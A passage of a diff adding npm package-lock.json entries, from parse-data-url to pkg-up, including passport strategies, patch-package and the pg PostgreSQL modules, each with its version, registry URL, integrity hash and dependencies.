"sha512-GQ2EWRpQV8/o+Aw8YqtfZZPfNRWZYkbidE9k5rpl/hC3vtHHBfGm2Ifi6qWV+coDGkrUKZAxE3Lot5kcsRlh+g==", + "dependencies": { + "callsites": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/parse-data-url": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/parse-data-url/-/parse-data-url-2.0.0.tgz", + "integrity": "sha512-6iXM6OBCHADCN9Bzv5QbWm1v41xSH15kIWE5hAJ9+sdkVM6pJFg+FlLm8n7gZ17pmZv6Wdr3+leXB2Uifxm7kw==", + "dependencies": { + "valid-data-url": "^2.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/parse-duration": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/parse-duration/-/parse-duration-1.1.0.tgz", + "integrity": "sha512-z6t9dvSJYaPoQq7quMzdEagSFtpGu+utzHqqxmpVWNNZRIXnvqyCvn9XsTdh7c/w0Bqmdz3RB3YnRaKtpRtEXQ==" + }, + "node_modules/parse-json": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", + "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", + "dev": true, + "dependencies": { + "@babel/code-frame": "^7.0.0", + "error-ex": "^1.3.1", + "json-parse-even-better-errors": "^2.3.0", + "lines-and-columns": "^1.1.6" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/parse-ms": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/parse-ms/-/parse-ms-2.1.0.tgz", + "integrity": "sha512-kHt7kzLoS9VBZfUsiKjv43mr91ea+U05EyKkEtqp7vNbHxmaVuEqN7XxeEVnGrMtYOAxGrDElSi96K7EgO1zCA==", + "engines": { + "node": ">=6" + } + }, + "node_modules/parse-srcset": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/parse-srcset/-/parse-srcset-1.0.2.tgz", + "integrity": "sha1-8r0iH2zJcKk42IVWq8WJyqqiveE=" + }, + "node_modules/parse5": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/parse5/-/parse5-6.0.1.tgz", + "integrity": 
"sha512-Ofn/CTFzRGTTxwpNEs9PP93gXShHcTq255nzRYSKe8AkVpZY7e1fpmTfOyoIvjP5HG7Z2ZM7VS9PPhQGW2pOpw==", + "dev": true + }, + "node_modules/parse5-htmlparser2-tree-adapter": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/parse5-htmlparser2-tree-adapter/-/parse5-htmlparser2-tree-adapter-6.0.1.tgz", + "integrity": "sha512-qPuWvbLgvDGilKc5BoicRovlT4MtYT6JfJyBOMDsKoiT+GiuP5qyrPCnR9HcPECIJJmZh5jRndyNThnhhb/vlA==", + "dev": true, + "dependencies": { + "parse5": "^6.0.1" + } + }, + "node_modules/parseurl": { + "version": "1.3.3", + "resolved": "https://registry.npmjs.org/parseurl/-/parseurl-1.3.3.tgz", + "integrity": "sha512-CiyeOxFT/JZyN5m0z9PfXw4SCBJ6Sygz1Dpl0wqjlhDEGGBP1GnsUVEL0p63hoG1fcj3fHynXi9NYO4nWOL+qQ==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/pascal-case": { + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/pascal-case/-/pascal-case-3.1.2.tgz", + "integrity": "sha512-uWlGT3YSnK9x3BQJaOdcZwrnV6hPpd8jFH1/ucpiLRPh/2zCVJKS19E4GvYHvaCcACn3foXZ0cLB9Wrx1KGe5g==", + "dev": true, + "dependencies": { + "no-case": "^3.0.4", + "tslib": "^2.0.3" + } + }, + "node_modules/pascalcase": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/pascalcase/-/pascalcase-0.1.1.tgz", + "integrity": "sha512-XHXfu/yOQRy9vYOtUDVMN60OEJjW013GoObG1o+xwQTpB9eYJX/BjXMsdW13ZDPruFhYYn0AG22w0xgQMwl3Nw==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/passport": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/passport/-/passport-0.6.0.tgz", + "integrity": "sha512-0fe+p3ZnrWRW74fe8+SvCyf4a3Pb2/h7gFkQ8yTJpAO50gDzlfjZUZTO1k5Eg9kUct22OxHLqDZoKUWRHOh9ug==", + "dependencies": { + "passport-strategy": "1.x.x", + "pause": "0.0.1", + "utils-merge": "^1.0.1" + }, + "engines": { + "node": ">= 0.4.0" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/jaredhanson" + } + }, + "node_modules/passport-google-oauth20": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/passport-google-oauth20/-/passport-google-oauth20-2.0.0.tgz", + "integrity": "sha512-KSk6IJ15RoxuGq7D1UKK/8qKhNfzbLeLrG3gkLZ7p4A6DBCcv7xpyQwuXtWdpyR0+E0mwkpjY1VfPOhxQrKzdQ==", + "dependencies": { + "passport-oauth2": "1.x.x" + }, + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/passport-ldapauth": { + "version": "2.1.4", + "resolved": "https://registry.npmjs.org/passport-ldapauth/-/passport-ldapauth-2.1.4.tgz", + "integrity": "sha512-VeVL69ZK+cpJe0DKMSGuwcf7k+V4dr0U0Y7ZhXL785pcRb5gRA6qYZfIH+XTsAzwqTK9l0Dn3Ds4weOZ1jKkLQ==", + "dependencies": { + "@types/node": "*", + "@types/passport": "^1.0.0", + "ldapauth-fork": "^4.3.2", + "passport-strategy": "^1.0.0" + }, + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/passport-local": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/passport-local/-/passport-local-1.0.0.tgz", + "integrity": "sha1-H+YyaMkudWBmJkN+O5BmYsFbpu4=", + "dependencies": { + "passport-strategy": "1.x.x" + }, + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/passport-oauth2": { + "version": "1.6.1", + "resolved": "https://registry.npmjs.org/passport-oauth2/-/passport-oauth2-1.6.1.tgz", + "integrity": "sha512-ZbV43Hq9d/SBSYQ22GOiglFsjsD1YY/qdiptA+8ej+9C1dL1TVB+mBE5kDH/D4AJo50+2i8f4bx0vg4/yDDZCQ==", + "dependencies": { + "base64url": "3.x.x", + "oauth": "0.9.x", + "passport-strategy": "1.x.x", + "uid2": "0.0.x", + "utils-merge": "1.x.x" + }, + "engines": { + "node": ">= 0.4.0" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/jaredhanson" + } 
+ }, + "node_modules/passport-orcid": { + "version": "0.0.4", + "resolved": "https://registry.npmjs.org/passport-orcid/-/passport-orcid-0.0.4.tgz", + "integrity": "sha512-swqn1PIQpzAz0qHXwlBlBaRFkfYXsXJ9o33T11QykCuuxR/UppbHGPgBOnrZaIf/Mytq6uYn8s5C4lAahaMYxQ==", + "dependencies": { + "passport-oauth2": "^1.5.0" + } + }, + "node_modules/passport-strategy": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/passport-strategy/-/passport-strategy-1.0.0.tgz", + "integrity": "sha1-tVOaqPwiWj0a0XlHbd8ja0QPUuQ=", + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/patch-package": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/patch-package/-/patch-package-8.0.0.tgz", + "integrity": "sha512-da8BVIhzjtgScwDJ2TtKsfT5JFWz1hYoBl9rUQ1f38MC2HwnEIkK8VN3dKMKcP7P7bvvgzNDbfNHtx3MsQb5vA==", + "dependencies": { + "@yarnpkg/lockfile": "^1.1.0", + "chalk": "^4.1.2", + "ci-info": "^3.7.0", + "cross-spawn": "^7.0.3", + "find-yarn-workspace-root": "^2.0.0", + "fs-extra": "^9.0.0", + "json-stable-stringify": "^1.0.2", + "klaw-sync": "^6.0.0", + "minimist": "^1.2.6", + "open": "^7.4.2", + "rimraf": "^2.6.3", + "semver": "^7.5.3", + "slash": "^2.0.0", + "tmp": "^0.0.33", + "yaml": "^2.2.2" + }, + "bin": { + "patch-package": "index.js" + }, + "engines": { + "node": ">=14", + "npm": ">5" + } + }, + "node_modules/patch-package/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/patch-package/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/patch-package/node_modules/fs-extra": { + "version": "9.1.0", + "resolved": "https://registry.npmjs.org/fs-extra/-/fs-extra-9.1.0.tgz", + "integrity": "sha512-hcg3ZmepS30/7BSFqRvoo3DOMQu7IjqxO5nCDt+zM9XWjb33Wg7ziNT+Qvqbuc3+gWpzO02JubVyk2G4Zvo1OQ==", + "dependencies": { + "at-least-node": "^1.0.0", + "graceful-fs": "^4.2.0", + "jsonfile": "^6.0.1", + "universalify": "^2.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/patch-package/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/patch-package/node_modules/open": { + "version": "7.4.2", + "resolved": "https://registry.npmjs.org/open/-/open-7.4.2.tgz", + "integrity": "sha512-MVHddDVweXZF3awtlAS+6pgKLlm/JgxZ90+/NBurBoQctVOOB/zDdVjcyPzQ+0laDGbsWgrRkflI65sQeOgT9Q==", + "dependencies": { + "is-docker": "^2.0.0", + "is-wsl": "^2.1.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/patch-package/node_modules/rimraf": { + "version": "2.7.1", + "resolved": 
"https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", + "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", + "dependencies": { + "glob": "^7.1.3" + }, + "bin": { + "rimraf": "bin.js" + } + }, + "node_modules/patch-package/node_modules/semver": { + "version": "7.6.0", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.0.tgz", + "integrity": "sha512-EnwXhrlwXMk9gKu5/flx5sv/an57AkRplG3hTK68W7FRDN+k+OWBj65M7719OkA82XLBxrcX0KSHj+X5COhOVg==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/patch-package/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/patch-package/node_modules/tmp": { + "version": "0.0.33", + "resolved": "https://registry.npmjs.org/tmp/-/tmp-0.0.33.tgz", + "integrity": "sha512-jRCJlojKnZ3addtTOjdIqoRuPEKBvNXcGYqzO6zWZX8KfKEpnGY5jfggJQ3EjKuu8D4bJRr0y+cYJFmYbImXGw==", + "dependencies": { + "os-tmpdir": "~1.0.2" + }, + "engines": { + "node": ">=0.6.0" + } + }, + "node_modules/patch-package/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/patch-package/node_modules/yaml": { + "version": "2.3.4", + "resolved": "https://registry.npmjs.org/yaml/-/yaml-2.3.4.tgz", + "integrity": "sha512-8aAvwVUSHpfEqTQ4w/KMlf3HcRdt50E5ODIQJBw1fQ5RL34xabzxtUlzTXVqc4rkZsPbvrXKWnABCD7kWSmocA==", + "engines": { + "node": ">= 14" + } + }, + "node_modules/path-browserify": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/path-browserify/-/path-browserify-1.0.1.tgz", + "integrity": "sha512-b7uo2UCUOYZcnF/3ID0lulOJi/bafxa1xPe7ZPsammBSpjSWQkjNxlt635YGS2MiR9GjvuXCtz2emr3jbsz98g==" + }, + "node_modules/path-exists": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", + "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", + "engines": { + "node": ">=8" + } + }, + "node_modules/path-is-absolute": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", + "integrity": "sha1-F0uSaHNVNP+8es5r9TpanhtcX18=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/path-key": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", + "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", + "engines": { + "node": ">=8" + } + }, + "node_modules/path-loader": { + "version": "1.0.10", + "resolved": "https://registry.npmjs.org/path-loader/-/path-loader-1.0.10.tgz", + "integrity": "sha512-CMP0v6S6z8PHeJ6NFVyVJm6WyJjIwFvyz2b0n2/4bKdS/0uZa/9sKUlYZzubrn3zuDRU0zIuEDX9DZYQ2ZI8TA==", + "dependencies": { + "native-promise-only": "^0.8.1", + "superagent": "^3.8.3" + } + }, + "node_modules/path-parse": { + "version": "1.0.7", + "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", + "integrity": 
"sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" + }, + "node_modules/path-scurry": { + "version": "1.11.1", + "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", + "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", + "dev": true, + "dependencies": { + "lru-cache": "^10.2.0", + "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" + }, + "engines": { + "node": ">=16 || 14 >=14.18" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/path-scurry/node_modules/lru-cache": { + "version": "10.2.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.2.0.tgz", + "integrity": "sha512-2bIM8x+VAf6JT4bKAljS1qUWgMsqZRPGJS6FSahIMPVvctcNhyVp7AJu7quxOW9jwkryBReKZY5tY5JYv2n/7Q==", + "dev": true, + "engines": { + "node": "14 || >=16.14" + } + }, + "node_modules/path-scurry/node_modules/minipass": { + "version": "7.0.4", + "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.0.4.tgz", + "integrity": "sha512-jYofLM5Dam9279rdkWzqHozUo4ybjdZmCsDHePy5V/PbBcVMiSZR97gmAy45aqi8CK1lG2ECd356FU86avfwUQ==", + "dev": true, + "engines": { + "node": ">=16 || 14 >=14.17" + } + }, + "node_modules/path-to-regexp": { + "version": "0.1.12", + "resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-0.1.12.tgz", + "integrity": "sha512-RA1GjUVMnvYFxuqovrEqZoxxW5NUZqbwKtYz/Tt7nXerk0LbLblQmrsgdeOxV5SFHf0UDggjS/bSeOZwt1pmEQ==", + "license": "MIT" + }, + "node_modules/path-type": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/path-type/-/path-type-4.0.0.tgz", + "integrity": "sha512-gDKb8aZMDeD/tZWs9P6+q0J9Mwkdl6xMV8TjnGP3qJVJ06bdMgkbBlLU8IdfOsIsFz2BW1rNVT3XuNEl8zPAvw==", + "dev": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/pathe": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/pathe/-/pathe-2.0.3.tgz", + "integrity": "sha512-WUjGcAqP1gQacoQe+OBJsFA7Ld4DyXuUIjZ5cc75cLHvJ7dtNsTugphxIADwspS+AraAUePCKrSVtPLFj/F88w==", + "dev": true, + "license": "MIT" + }, + "node_modules/pathval": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/pathval/-/pathval-1.1.1.tgz", + "integrity": "sha512-Dp6zGqpTdETdR63lehJYPeIOqpiNBNtc7BpWSLrOje7UaIsE5aY92r/AunQA7rsXvet3lrJ3JnZX29UPTKXyKQ==", + "dev": true, + "engines": { + "node": "*" + } + }, + "node_modules/pause": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/pause/-/pause-0.0.1.tgz", + "integrity": "sha1-HUCLP9t2kjuVQ9lvtMnf1TXZy10=" + }, + "node_modules/pdf-parse": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/pdf-parse/-/pdf-parse-1.1.1.tgz", + "integrity": "sha512-v6ZJ/efsBpGrGGknjtq9J/oC8tZWq0KWL5vQrk2GlzLEQPUDB1ex+13Rmidl1neNN358Jn9EHZw5y07FFtaC7A==", + "dev": true, + "license": "MIT", + "dependencies": { + "debug": "^3.1.0", + "node-ensure": "^0.0.0" + }, + "engines": { + "node": ">=6.8.1" + } + }, + "node_modules/pdf-parse/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/pdfjs-dist": { + "version": "4.10.38", + "resolved": "https://registry.npmjs.org/pdfjs-dist/-/pdfjs-dist-4.10.38.tgz", + "integrity": "sha512-/Y3fcFrXEAsMjJXeL9J8+ZG9U01LbuWaYypvDW2ycW1jL269L3js3DVBjDJ0Up9Np1uqDXsDrRihHANhZOlwdQ==", + "dev": true, + 
"license": "Apache-2.0", + "engines": { + "node": ">=20" + }, + "optionalDependencies": { + "@napi-rs/canvas": "^0.1.65" + } + }, + "node_modules/pend": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/pend/-/pend-1.2.0.tgz", + "integrity": "sha1-elfrVQpng/kRUzH89GY9XI4AelA=" + }, + "node_modules/performance-now": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", + "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" + }, + "node_modules/pg": { + "version": "8.7.1", + "resolved": "https://registry.npmjs.org/pg/-/pg-8.7.1.tgz", + "integrity": "sha512-7bdYcv7V6U3KAtWjpQJJBww0UEsWuh4yQ/EjNf2HeO/NnvKjpvhEIe/A/TleP6wtmSKnUnghs5A9jUoK6iDdkA==", + "dependencies": { + "buffer-writer": "2.0.0", + "packet-reader": "1.0.0", + "pg-connection-string": "^2.5.0", + "pg-pool": "^3.4.1", + "pg-protocol": "^1.5.0", + "pg-types": "^2.1.0", + "pgpass": "1.x" + }, + "engines": { + "node": ">= 8.0.0" + }, + "peerDependencies": { + "pg-native": ">=2.0.0" + }, + "peerDependenciesMeta": { + "pg-native": { + "optional": true + } + } + }, + "node_modules/pg-connection-string": { + "version": "2.5.0", + "resolved": "https://registry.npmjs.org/pg-connection-string/-/pg-connection-string-2.5.0.tgz", + "integrity": "sha512-r5o/V/ORTA6TmUnyWZR9nCj1klXCO2CEKNRlVuJptZe85QuhFayC7WeMic7ndayT5IRIR0S0xFxFi2ousartlQ==" + }, + "node_modules/pg-copy-streams": { + "version": "2.2.2", + "resolved": "https://registry.npmjs.org/pg-copy-streams/-/pg-copy-streams-2.2.2.tgz", + "integrity": "sha512-mjSqs6hrsRhBojCuY2hxyg48B+3th5ARBjMxBCEisIqBvdRD0g5ETdbts20TzrOfha8ueJQOmQCJCprtczJtGQ==" + }, + "node_modules/pg-cursor": { + "version": "2.12.1", + "resolved": "https://registry.npmjs.org/pg-cursor/-/pg-cursor-2.12.1.tgz", + "integrity": "sha512-V13tEaA9Oq1w+V6Q3UBIB/blxJrwbbr35/dY54r/86soBJ7xkP236bXaORUTVXUPt9B6Ql2BQu+uwQiuMfRVgg==", + "peerDependencies": { + "pg": "^8" + } + }, + "node_modules/pg-int8": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/pg-int8/-/pg-int8-1.0.1.tgz", + "integrity": "sha512-WCtabS6t3c8SkpDBUlb1kjOs7l66xsGdKpIPZsg4wR+B3+u9UAum2odSsF9tnvxg80h4ZxLWMy4pRjOsFIqQpw==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/pg-pool": { + "version": "3.4.1", + "resolved": "https://registry.npmjs.org/pg-pool/-/pg-pool-3.4.1.tgz", + "integrity": "sha512-TVHxR/gf3MeJRvchgNHxsYsTCHQ+4wm3VIHSS19z8NC0+gioEhq1okDY1sm/TYbfoP6JLFx01s0ShvZ3puP/iQ==", + "peerDependencies": { + "pg": ">=8.0" + } + }, + "node_modules/pg-protocol": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/pg-protocol/-/pg-protocol-1.5.0.tgz", + "integrity": "sha512-muRttij7H8TqRNu/DxrAJQITO4Ac7RmX3Klyr/9mJEOBeIpgnF8f9jAfRz5d3XwQZl5qBjF9gLsUtMPJE0vezQ==" + }, + "node_modules/pg-query-stream": { + "version": "4.7.1", + "resolved": "https://registry.npmjs.org/pg-query-stream/-/pg-query-stream-4.7.1.tgz", + "integrity": "sha512-UMgsgn/pOIYsIifRySp59vwlpTpLADMK9HWJtq5ff0Z3MxBnPMGnCQeaQl5VuL+7ov4F96mSzIRIcz+Duo6OiQ==", + "dependencies": { + "pg-cursor": "^2.12.1" + }, + "peerDependencies": { + "pg": "^8" + } + }, + "node_modules/pg-types": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/pg-types/-/pg-types-2.2.0.tgz", + "integrity": "sha512-qTAAlrEsl8s4OiEQY69wDvcMIdQN6wdz5ojQiOy6YRMuynxenON0O5oCpJI6lshc6scgAY8qvJ2On/p+CXY0GA==", + "dependencies": { + "pg-int8": "1.0.1", + "postgres-array": "~2.0.0", + "postgres-bytea": "~1.0.0", + "postgres-date": "~1.0.4", + "postgres-interval": "^1.1.0" + }, + "engines": { + "node": ">=4" + } + 
}, + "node_modules/pgpass": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/pgpass/-/pgpass-1.0.5.tgz", + "integrity": "sha512-FdW9r/jQZhSeohs1Z3sI1yxFQNFvMcnmfuj4WBMUTxOrAyLMaTcE1aAMBiTlbMNaXvBCQuVi0R7hd8udDSP7ug==", + "dependencies": { + "split2": "^4.1.0" + } + }, + "node_modules/picocolors": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.1.tgz", + "integrity": "sha512-anP1Z8qwhkbmu7MFP5iTt+wQKXgwzf7zTyGlcdzabySa9vd0Xt392U0rVmz9poOaBj0uHJKyyo9/upk0HrEQew==" + }, + "node_modules/picomatch": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", + "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", + "engines": { + "node": ">=8.6" + }, + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" + } + }, + "node_modules/pify": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/pify/-/pify-2.3.0.tgz", + "integrity": "sha1-7RQaasBDqEnqWISY59yosVMw6Qw=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/pinkie": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/pinkie/-/pinkie-2.0.4.tgz", + "integrity": "sha1-clVrgM+g1IqXToDnckjoDtT3+HA=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/pinkie-promise": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/pinkie-promise/-/pinkie-promise-2.0.1.tgz", + "integrity": "sha1-ITXW36ejWMBprJsXh3YogihFD/o=", + "dependencies": { + "pinkie": "^2.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/pirates": { + "version": "4.0.6", + "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", + "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", + "dev": true, + "engines": { + "node": ">= 6" + } + }, + "node_modules/pkg-dir": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", + "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", + "dev": true, + "dependencies": { + "find-up": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/pkg-dir/node_modules/find-up": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", + "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", + "dev": true, + "dependencies": { + "locate-path": "^5.0.0", + "path-exists": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/pkg-dir/node_modules/locate-path": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", + "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", + "dev": true, + "dependencies": { + "p-locate": "^4.1.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/pkg-dir/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dev": true, + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/pkg-dir/node_modules/p-locate": { + "version": "4.1.0", + "resolved": 
"https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", + "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", + "dev": true, + "dependencies": { + "p-limit": "^2.2.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/pkg-types": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/pkg-types/-/pkg-types-1.3.1.tgz", + "integrity": "sha512-/Jm5M4RvtBFVkKWRu2BLUTNP8/M2a+UwuAX+ae4770q1qVGtfjG+WTCupoZixokjmHiry8uI+dlY8KXYV5HVVQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "confbox": "^0.1.8", + "mlly": "^1.7.4", + "pathe": "^2.0.1" + } + }, + "node_modules/pkg-up": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/pkg-up/-/pkg-up-3.1.0.tgz", + "integrity": "sha512-nDywThFk1i4BQK4twPQ6TA4RT8bDY96yeuCVBWL3ePARCiEKDRSrNGbFIgUJpLp+XeIR65v8ra7WuJOFUBtkMA==", + "dev": true, + "dependencies": { + "find-up": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/pkg-up/node_modules/find-up": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-3.0.0.tgz", + "integrity": 